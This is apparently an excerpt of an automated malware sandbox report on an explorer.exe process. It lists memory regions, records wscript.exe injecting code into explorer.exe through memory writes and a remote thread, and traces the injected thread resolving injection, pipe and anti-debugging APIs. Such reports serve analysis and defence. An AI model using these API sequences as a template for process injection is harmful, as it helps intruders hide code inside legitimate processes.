private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True True False
explorer.exe.mui 0x00130000 0x00137fff Memory Mapped File Readable False False False -
pagefile_0x0000000000140000 0x00140000 0x00153fff Pagefile Backed Memory Readable True False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f2fff Pagefile Backed Memory Readable True False False -
private_0x0000000000200000 0x00200000 0x00201fff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x00242fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000250000 0x00250000 0x0028ffff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x002cffff Private Memory Readable, Writable True False False -
private_0x00000000002d0000 0x002d0000 0x002d0fff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x002e0fff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x002f3fff Private Memory Readable, Writable True False False -
private_0x0000000000300000 0x00300000 0x003fffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x00403fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000410000 0x00410000 0x00410fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x00420000 0x00420fff Memory Mapped File Readable, Writable True False False -
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True False False -
locale.nls 0x00440000 0x004fdfff Memory Mapped File Readable False False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True True False
private_0x0000000000500000 0x00500000 0x005fffff Private Memory Readable, Writable True False False -
private_0x0000000000540000 0x00540000 0x0057ffff Private Memory Readable, Writable True True False
private_0x0000000000580000 0x00580000 0x005bffff Private Memory Readable, Writable True True False
private_0x00000000005c0000 0x005c0000 0x005fffff Private Memory Readable, Writable True True False
private_0x0000000000600000 0x00600000 0x00642fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000650000 0x00650000 0x00650fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000660000 0x00660000 0x00661fff Pagefile Backed Memory Readable True False False -
mswsock.dll.mui 0x00670000 0x00672fff Memory Mapped File Readable False False False -
private_0x0000000000680000 0x00680000 0x0068ffff Private Memory Readable, Writable True False False -
private_0x0000000000690000 0x00690000 0x006cffff Private Memory Readable, Writable True False False -
private_0x00000000006d0000 0x006d0000 0x0070ffff Private Memory Readable, Writable True False False -
private_0x0000000000710000 0x00710000 0x0071ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000720000 0x00720000 0x008a7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008b0000 0x008b0000 0x00a30fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x00a40000 0x00d76fff Memory Mapped File Readable False False False -
private_0x0000000000d80000 0x00d80000 0x00dbffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000d80000 0x00d80000 0x00d8ffff Pagefile Backed Memory Readable True False False -
private_0x0000000000dc0000 0x00dc0000 0x00dfffff Private Memory Readable, Writable True False False -
explorer.exe 0x00e00000 0x011d6fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x00000000011e0000 0x011e0000 0x051dffff Pagefile Backed Memory - True False False -
pagefile_0x00000000051e0000 0x051e0000 0x065dffff Pagefile Backed Memory Readable True False False -
private_0x00000000065e0000 0x065e0000 0x067dffff Private Memory Readable, Writable True True False
private_0x00000000065e0000 0x065e0000 0x066e9fff Private Memory Readable, Writable True False False -
pagefile_0x00000000066f0000 0x066f0000 0x066f1fff Pagefile Backed Memory Readable True False False -
private_0x0000000006700000 0x06700000 0x0673ffff Private Memory Readable, Writable True False False -
private_0x0000000006740000 0x06740000 0x0677ffff Private Memory Readable, Writable True False False -
crypt32.dll.mui 0x06780000 0x06789fff Memory Mapped File Readable False False False -
private_0x0000000006790000 0x06790000 0x067cffff Private Memory Readable, Writable True False False -
private_0x00000000067d0000 0x067d0000 0x067dffff Private Memory Readable, Writable True False False -
private_0x00000000067e0000 0x067e0000 0x068e9fff Private Memory Readable, Writable True False False -
private_0x00000000068f0000 0x068f0000 0x069f5fff Private Memory Readable, Writable True False False -
private_0x0000000006a00000 0x06a00000 0x06a3ffff Private Memory Readable, Writable True False False -
private_0x0000000006a40000 0x06a40000 0x06b3ffff Private Memory Readable, Writable True False False -
private_0x0000000006bd0000 0x06bd0000 0x06dd3fff Private Memory Readable, Writable True False False -
private_0x0000000006de0000 0x06de0000 0x06fdffff Private Memory Readable, Writable True False False -
wow64cpu.dll 0x5c9f0000 0x5c9f7fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x5ca00000 0x5ca72fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x5ca80000 0x5cacefff Memory Mapped File Readable, Writable, Executable False False False -
gpapi.dll 0x72a60000 0x72a7efff Memory Mapped File Readable, Writable, Executable False False False -
ncryptsslp.dll 0x72a80000 0x72a99fff Memory Mapped File Readable, Writable, Executable False False False -
ntasn1.dll 0x72aa0000 0x72ac7fff Memory Mapped File Readable, Writable, Executable False False False -
ncrypt.dll 0x72ad0000 0x72aeffff Memory Mapped File Readable, Writable, Executable False False False -
mskeyprotect.dll 0x72af0000 0x72afffff Memory Mapped File Readable, Writable, Executable False False False -
schannel.dll 0x72b00000 0x72b5ffff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x72b60000 0x72c06fff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x72c10000 0x72c20fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x72c30000 0x72c37fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x72c40000 0x72c85fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x72c90000 0x72c9afff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x72ca0000 0x72cedfff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x72cf0000 0x72d02fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x72d10000 0x72d25fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x72d30000 0x72d41fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x72d50000 0x72d57fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x72d60000 0x72d8ffff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x72d90000 0x72e13fff Memory Mapped File Readable, Writable, Executable False False False -
sppc.dll 0x72e20000 0x72e3cfff Memory Mapped File Readable, Writable, Executable False False False -
dxgi.dll 0x72e40000 0x72ebdfff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x72ec0000 0x72ee0fff Memory Mapped File Readable, Writable, Executable False False False -
dcomp.dll 0x72ef0000 0x72f8bfff Memory Mapped File Readable, Writable, Executable False False False -
d3d11.dll 0x72f90000 0x731a2fff Memory Mapped File Readable, Writable, Executable False False False -
twinapi.dll 0x731b0000 0x73248fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x73250000 0x73391fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x733b0000 0x733defff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x733e0000 0x733f2fff Memory Mapped File Readable, Writable, Executable False False False -
dpapi.dll 0x73400000 0x73407fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x73410000 0x736d0fff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x736e0000 0x736fafff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x73700000 0x73718fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x73720000 0x7387ffff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x738f0000 0x73af8fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x73b00000 0x73b09fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x73b20000 0x73d43fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x740f0000 0x7410cfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74110000 0x74184fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x74190000 0x74220fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74230000 0x74288fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74290000 0x74299fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x742a0000 0x742bdfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74500000 0x7463ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74730000 0x7475afff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x74760000 0x75b1efff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75b80000 0x75c3dfff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x75c40000 0x75c83fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x75cf0000 0x75d31fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x75d40000 0x75dbafff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75dc0000 0x75e03fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75f20000 0x76095fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x760a0000 0x760e2fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x76280000 0x7630cfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x763b0000 0x76441fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76470000 0x764cbfff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x764d0000 0x769acfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x769b0000 0x76afcfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76bc0000 0x76caffff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x76cf0000 0x76ea9fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x76eb0000 0x76ebbfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76ec0000 0x77034fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77040000 0x77046fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x77050000 0x7705efff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x77060000 0x7706dfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77070000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77190000 0x77308fff Memory Mapped File Readable, Writable, Executable False False False -
sysmain.sdb 0x7eb90000 0x7ef1ffff Memory Mapped File Readable False False False -
private_0x000000007ef21000 0x7ef21000 0x7ef23fff Private Memory Readable, Writable True False False -
private_0x000000007ef24000 0x7ef24000 0x7ef26fff Private Memory Readable, Writable True True False
private_0x000000007ef27000 0x7ef27000 0x7ef29fff Private Memory Readable, Writable True True False
private_0x000000007ef2a000 0x7ef2a000 0x7ef2cfff Private Memory Readable, Writable True True False
private_0x000000007ef2d000 0x7ef2d000 0x7ef2ffff Private Memory Readable, Writable True True False
pagefile_0x000000007ef30000 0x7ef30000 0x7f02ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f030000 0x7f030000 0x7f052fff Pagefile Backed Memory Readable True False False -
private_0x000000007f054000 0x7f054000 0x7f056fff Private Memory Readable, Writable True True False
private_0x000000007f057000 0x7f057000 0x7f059fff Private Memory Readable, Writable True False False -
private_0x000000007f05a000 0x7f05a000 0x7f05cfff Private Memory Readable, Writable True False False -
private_0x000000007f05d000 0x7f05d000 0x7f05dfff Private Memory Readable, Writable True False False -
private_0x000000007f05f000 0x7f05f000 0x7f05ffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfb3d30ffff Private Memory Readable True False False -
pagefile_0x00007dfb3d310000 0x7dfb3d310000 0x7ffb3d30ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb3d4d2000 0x7ffb3d4d2000 0x7ffffffeffff Private Memory Readable True False False -
Injection Information
Injection Type Source Process Source OS Thread ID Information Success Count Logfile
Modify Memory #7: c:\windows\system32\wscript.exe 0x250 address = 0x210000, size = 207872 True 1
Fn
Data
Create Remote Thread #7: c:\windows\system32\wscript.exe 0x250 address = 0x210000 True 1
Fn
Threads
Thread 0xc78
418 464
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76be61d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileA, address_out = 0x76bdc240 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileA, address_out = 0x76be6270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteProcThreadAttributeList, address_out = 0x75fdc160 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x771cda90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UpdateProcThreadAttribute, address_out = 0x75fd7f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76bd25e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76bd7910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x76c00a00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76bd8b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x76c02a00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x76c029a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ProcessIdToSessionId, address_out = 0x76bd9620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76bd8c50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x76be5f30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeProcThreadAttributeList, address_out = 0x75fd80b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x76c02ae0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetThreadContext, address_out = 0x76bdeb70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadContext, address_out = 0x76c02700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76bd98f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76bd8c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Thread32First, address_out = 0x76be4a90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Thread32Next, address_out = 0x76be2430 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76bd2af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76bdd8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenThread, address_out = 0x76bd8780 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76be7510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76bd9fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SuspendThread, address_out = 0x76bded00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResumeThread, address_out = 0x76bda280 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PeekNamedPipe, address_out = 0x76c01c40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitNamedPipeA, address_out = 0x76bfe290 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetNamedPipeHandleState, address_out = 0x76c02600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76bd8840 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76bd87c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileA, address_out = 0x76bdc510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32First, address_out = 0x76bded60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76bdfbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32Next, address_out = 0x76bdc8e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileA, address_out = 0x76be6210 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FileTimeToSystemTime, address_out = 0x76be65f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesA, address_out = 0x76be6310 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsA, address_out = 0x76c00da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x76bdec30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToTzSpecificLocalTime, address_out = 0x76be4910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFullPathNameA, address_out = 0x76be63c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76bd9700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76bd9640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeA, address_out = 0x76bfdde0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76bd7940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76be64a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76bd75c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x76c00820 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76bd2da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76be5f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x76be6380 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentDirectoryA, address_out = 0x76c00ff0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x76bd0570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentDirectoryW, address_out = 0x76bda470 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76bd2db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76bd9730 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCurrentDirectoryA, address_out = 0x76c02500 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76be62a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x76c00ba0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76bd2d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x76c00960 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76bd92b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76be6590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x76be6550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76be6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76be6170 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76bd1d90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c02560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableW, address_out = 0x76bde360 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76be2230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76bddb10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x76be64f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76bd79b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76bdf930 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76bd9a40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76bdfc20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualQuery, address_out = 0x76bd8c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76bd9560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76c026a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76be6920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76be6880 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76be6910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76bde240 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x771e4f40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76bda090 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76bd9fc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DebugBreak, address_out = 0x76c00b30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76bd9ec0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76bd2dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76bda3b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76bda0f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76bdfd10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocalTime, address_out = 0x76bd9a60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76bd8770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76bd77b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x76bdf4b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76be57f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStrings, address_out = 0x76c01090 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsA, address_out = 0x76c00e20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76be6530 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76be6390 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76bd9660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76be74f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x76be61a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x76be6140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryA, address_out = 0x76be64d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76bd1b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76bda3c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76bd2b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c028e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76bda2c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76bda790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76bd9950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76bdd940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771e9920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x771d5e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771d5e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x771cbae0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76bda060 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76bda040 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76bd1ba0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76bd9a70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76bd1da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76bd9930 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76bd7520 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76bd7560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76be6020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76bd9a80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76bd75a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76be6860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76be6870 True 1
Fn
